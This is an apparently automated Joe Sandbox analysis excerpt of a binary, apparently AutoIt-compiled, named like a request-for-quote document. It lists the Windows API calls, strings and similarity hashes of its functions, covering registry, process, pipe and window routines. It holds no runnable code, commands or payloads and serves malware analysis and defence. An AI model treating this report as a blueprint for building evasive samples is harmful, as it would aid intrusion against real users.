                                              • Instruction Fuzzy Hash: CBE05276104505FBDA011FE5FC0C95ABB69FB8A762B508639F21981970CBB294A2DB50
                                              Function 00158902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00158928
                                              • CharUpperBuffW.USER32(?,?), ref: 00158A37
                                              • VariantClear.OLEAUT32(?), ref: 00158BAF
                                                • Part of subcall function 00147804: VariantInit.OLEAUT32(00000000), ref: 00147844
                                                • Part of subcall function 00147804: VariantCopy.OLEAUT32(00000000,?), ref: 0014784D
                                                • Part of subcall function 00147804: VariantClear.OLEAUT32(00000000), ref: 00147859
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4237274167-1221869570
                                              • Opcode ID: c4c611cf3ca88d68ef40d7944cbbfe43cb1c31d658b2c9ccf5c2bc76714be509
                                              • Instruction ID: da9b332a21a7e09577f25cfe7b660c146243f644b95d33e0579125ce4ab11121
                                              • Opcode Fuzzy Hash: c4c611cf3ca88d68ef40d7944cbbfe43cb1c31d658b2c9ccf5c2bc76714be509
                                              • Instruction Fuzzy Hash: E9919070608341DFC704DF29C48096ABBE4EFC8315F04496EF89A9B362DB30E949CB52
                                              Function 00142F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000FFEC6: _wcscpy.LIBCMT ref: 000FFEE9
                                              • _memset.LIBCMT ref: 00143077
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001430A6
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00143159
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00143187
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                              • String ID: 0
                                              • API String ID: 4152858687-4108050209
                                              • Opcode ID: 8cfecc15f5e7ed1300a823cdf7385115830b6140e94f864bbc7fdc55a75a97e6
                                              • Instruction ID: ac9734628946515e9124907e263ded1f4cc3f3da2204f67ab730c477f8052d04
                                              • Opcode Fuzzy Hash: 8cfecc15f5e7ed1300a823cdf7385115830b6140e94f864bbc7fdc55a75a97e6
                                              • Instruction Fuzzy Hash: F151A0716083019ED7299F28D845A6BB7E8EF55B20F040A2EF8A5D31F1DB74CE44C792
                                              Function 00169A63 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(00F1EBE8,?), ref: 00169AD2
                                              • ScreenToClient.USER32(00000002,00000002), ref: 00169B05
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00169B72
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID: @U=u
                                              • API String ID: 3880355969-2594219639
                                              • Opcode ID: 2234064320d833577431b4dd05974b1c1efdc1eae7bf57c0c1437b5eb1e8d33c
                                              • Instruction ID: 628cdc024f74f30629863d6919f13b62354c2097a6b2829807659dc158e28728
                                              • Opcode Fuzzy Hash: 2234064320d833577431b4dd05974b1c1efdc1eae7bf57c0c1437b5eb1e8d33c
                                              • Instruction Fuzzy Hash: A7512C75A00209EFCF10DF68ED80DAE7BB9FB55360F148169F8259B2A0D770AD91CB90
                                              Function 0013DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0013DAC5
                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0013DAFB
                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0013DB0C
                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0013DB8E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                              • String ID: DllGetClassObject
                                              • API String ID: 753597075-1075368562
                                              • Opcode ID: 7d8c2fb4939dd0fab5171207497461c1a763578efd93cefa8e4a2678fd629d31
                                              • Instruction ID: 201cbee5479742f043806de7a9bca6d2dd2523cb2c177969845d4213ed2833dd
                                              • Opcode Fuzzy Hash: 7d8c2fb4939dd0fab5171207497461c1a763578efd93cefa8e4a2678fd629d31
                                              • Instruction Fuzzy Hash: 394182B1600208EFDB15CF54E884A9ABBB9EF45350F1680ADED099F209D7B1DE44CBA0
                                              Function 00142C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00142CAF
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00142CCB
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00142D11
                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001A6890,00000000), ref: 00142D5A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem_memset
                                              • String ID: 0
                                              • API String ID: 1173514356-4108050209
                                              • Opcode ID: 6f5f4e846ab2a32c6ff984871544a4aa27674f8e73350bb0f82eedc44d3a302e
                                              • Instruction ID: 957779bb8dd0298148abeb05827f9fc14266b48267b74e3ab0e10897d0f05377
                                              • Opcode Fuzzy Hash: 6f5f4e846ab2a32c6ff984871544a4aa27674f8e73350bb0f82eedc44d3a302e
                                              • Instruction Fuzzy Hash: E241C0706043029FD724DF64CC85B5ABBE8EF85320F444A2EF966972E1D770E985CB92
                                              Function 00168AC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON
                                              Download Yara Rule
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00168B4D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID: @U=u
                                              • API String ID: 634782764-2594219639
                                              • Opcode ID: f19aa1cd9b5bdc19a01214cfa62fa47694bdf482eab3f0435c1c6b22d5ef3dd0
                                              • Instruction ID: 62f99189c52150610a5c7fb63a8bfd621630564deee68d03eeaa41d84efc72a6
                                              • Opcode Fuzzy Hash: f19aa1cd9b5bdc19a01214cfa62fa47694bdf482eab3f0435c1c6b22d5ef3dd0
                                              • Instruction Fuzzy Hash: 2F31D4B4604204BFEF349F58DC99FA937A4EB0A310F284716FA51D72E1CF70A9A09B51
                                              Function 0015DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0015DAD9
                                                • Part of subcall function 000E79AB: _memmove.LIBCMT ref: 000E79F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharLower_memmove
                                              • String ID: cdecl$none$stdcall$winapi
                                              • API String ID: 3425801089-567219261
                                              • Opcode ID: 2e71865d99cb2b626998e5d4d67c1ed4fddaa2cd89c2fa7553321dea08221e69
                                              • Instruction ID: 567bd780c3a29a7a545862369fa05fd6605b1ccd3812522a9c4ca40722919ee4
                                              • Opcode Fuzzy Hash: 2e71865d99cb2b626998e5d4d67c1ed4fddaa2cd89c2fa7553321dea08221e69
                                              • Instruction Fuzzy Hash: 8631B47050421ADFCF10EF94DD819EEB3B5FF15310B148A29E875AB6D2CB71A909CB90
                                              Function 00166656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000E1D73
                                                • Part of subcall function 000E1D35: GetStockObject.GDI32(00000011), ref: 000E1D87
                                                • Part of subcall function 000E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000E1D91
                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001666D0
                                              • LoadLibraryW.KERNEL32(?), ref: 001666D7
                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001666EC
                                              • DestroyWindow.USER32(?), ref: 001666F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                              • String ID: SysAnimate32
                                              • API String ID: 4146253029-1011021900
                                              • Opcode ID: a717f95e0b5364673c40077597ad2e2314cfe37baa6f8b7329caa47c84e450a1
                                              • Instruction ID: 6d3d5116a3444d3a69de760035f0ae11172098c2ed53470b5a5cd8c0fbc2e3ab
                                              • Opcode Fuzzy Hash: a717f95e0b5364673c40077597ad2e2314cfe37baa6f8b7329caa47c84e450a1
                                              • Instruction Fuzzy Hash: E6216DB1200206AFEF104F68EC80EBB77ADEB59368F514629F911921A0D7B1DCA19761
                                              Function 0014703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 0014705E
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00147091
                                              • GetStdHandle.KERNEL32(0000000C), ref: 001470A3
                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001470DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: e792711d9c1c5ae0e2c6f332a57cd11b9fadc7300bdfe9561108160e0fc20b38
                                              • Instruction ID: 05baf716477c0781c5f8ddc97a51fe3cda228a7e2aacc92d4feaaddc991f8aaf
                                              • Opcode Fuzzy Hash: e792711d9c1c5ae0e2c6f332a57cd11b9fadc7300bdfe9561108160e0fc20b38
                                              • Instruction Fuzzy Hash: F2219074505309ABDF209F78DC05A9AB7B8BF56724F204A19FCA0D72E0E7B0D841CB51
                                              Function 0014710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 0014712B
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0014715D
                                              • GetStdHandle.KERNEL32(000000F6), ref: 0014716E
                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001471A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: f57a0e7c7ba8f6de2ea3b439144f0315872175828edd7dd33e62c718732c1b9f
                                              • Instruction ID: 10773f695a4f596a975591b8a8dbeb1f966cedf98004dd27b03ad39c41d12155
                                              • Opcode Fuzzy Hash: f57a0e7c7ba8f6de2ea3b439144f0315872175828edd7dd33e62c718732c1b9f
                                              • Instruction Fuzzy Hash: 6C216275604316ABDF209F689C04AAAB7E8AF55B34F200A1DFDB1D72E0D7B09845CB61
                                              Function 0014AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 0014AEBF
                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0014AF13
                                              • __swprintf.LIBCMT ref: 0014AF2C
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0016F910), ref: 0014AF6A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorMode$InformationVolume__swprintf
                                              • String ID: %lu
                                              • API String ID: 3164766367-685833217
                                              • Opcode ID: 7d7f6f2de7527498961122f08a0e0ba09d7cc8bf5c1c3b48ae73a80ba6093da5
                                              • Instruction ID: 349157cedb40fcea2b0b687473e8c3f73cf5f794c14fa212805dd1946979deca
                                              • Opcode Fuzzy Hash: 7d7f6f2de7527498961122f08a0e0ba09d7cc8bf5c1c3b48ae73a80ba6093da5
                                              • Instruction Fuzzy Hash: C9214430600149AFCB10DF65DD85DEE77B8EF49704B104069F909EB252DB71EA45CB61
                                              Function 0013A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                                • Part of subcall function 0013A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0013A399
                                                • Part of subcall function 0013A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0013A3AC
                                                • Part of subcall function 0013A37C: GetCurrentThreadId.KERNEL32 ref: 0013A3B3
                                                • Part of subcall function 0013A37C: AttachThreadInput.USER32(00000000), ref: 0013A3BA
                                              • GetFocus.USER32 ref: 0013A554
                                                • Part of subcall function 0013A3C5: GetParent.USER32(?), ref: 0013A3D3
                                              • GetClassNameW.USER32(?,?,00000100), ref: 0013A59D
                                              • EnumChildWindows.USER32(?,0013A615), ref: 0013A5C5
                                              • __swprintf.LIBCMT ref: 0013A5DF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                              • String ID: %s%d
                                              • API String ID: 1941087503-1110647743
                                              • Opcode ID: f90ddea5f6f14a493d6ae5b30300ab49d628f44ea34a87412ef6689990ace5a2
                                              • Instruction ID: 4bef875dfe8e52ea4c9a6414b4e59666c5465d3d809f7a68ed9cc83f9c1dac44
                                              • Opcode Fuzzy Hash: f90ddea5f6f14a493d6ae5b30300ab49d628f44ea34a87412ef6689990ace5a2
                                              • Instruction Fuzzy Hash: EA11A2B12442086BDF10BF65EC8AFEA3778AF48700F044079F948AA153CB7159468B75
                                              Function 00142017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00142048
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                              • API String ID: 3964851224-769500911
                                              • Opcode ID: a77ed707fea46cb965c16e4ab67148f5129b3a506375e267ad7514089b4ecfda
                                              • Instruction ID: 9034b4cdaa7994205a2bbd6e231f19882d1817254be78cd71603af32d06bdfb8
                                              • Opcode Fuzzy Hash: a77ed707fea46cb965c16e4ab67148f5129b3a506375e267ad7514089b4ecfda
                                              • Instruction Fuzzy Hash: FE116130900109CFCF00EFA4D9415FEB7F4FF25304F908468E855672A2EB72590ACB50
                                              Function 0015EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0015EF1B
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0015EF4B
                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0015F07E
                                              • CloseHandle.KERNEL32(?), ref: 0015F0FF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                              • String ID:
                                              • API String ID: 2364364464-0
                                              • Opcode ID: 5e933ffc982aa8df4f580cff92c7a1c379f211ec793d315db64804b182505ffd
                                              • Instruction ID: 7b2e9e50ab0b604f05b9c528f615ab27b08a41de8b2c45df99b1d79f63dbae89
                                              • Opcode Fuzzy Hash: 5e933ffc982aa8df4f580cff92c7a1c379f211ec793d315db64804b182505ffd
                                              • Instruction Fuzzy Hash: BE8163B16043009FD724DF29CC86F6AB7E5AF48710F14882DF999EB392DB70AD458B91
                                              Function 001602C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 001610A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00160038,?,?), ref: 001610BC
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00160388
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001603C7
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0016040E
                                              • RegCloseKey.ADVAPI32(?,?), ref: 0016043A
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00160447
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3440857362-0
                                              • Opcode ID: 05eb21a84451da7171f1817e6c8fd29e4084939e64d09548f6af411cb52a09cc
                                              • Instruction ID: 5cfb80184df269a85b42024743f3b93681f8e165b45336d94699c892dd3bca21
                                              • Opcode Fuzzy Hash: 05eb21a84451da7171f1817e6c8fd29e4084939e64d09548f6af411cb52a09cc
                                              • Instruction Fuzzy Hash: 55514531208244AFD705EB65DC81EAFB7E8FF88304F04892DF596972A2DB70E915CB52
                                              Function 0014E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0014E88A
                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0014E8B3
                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0014E8F2
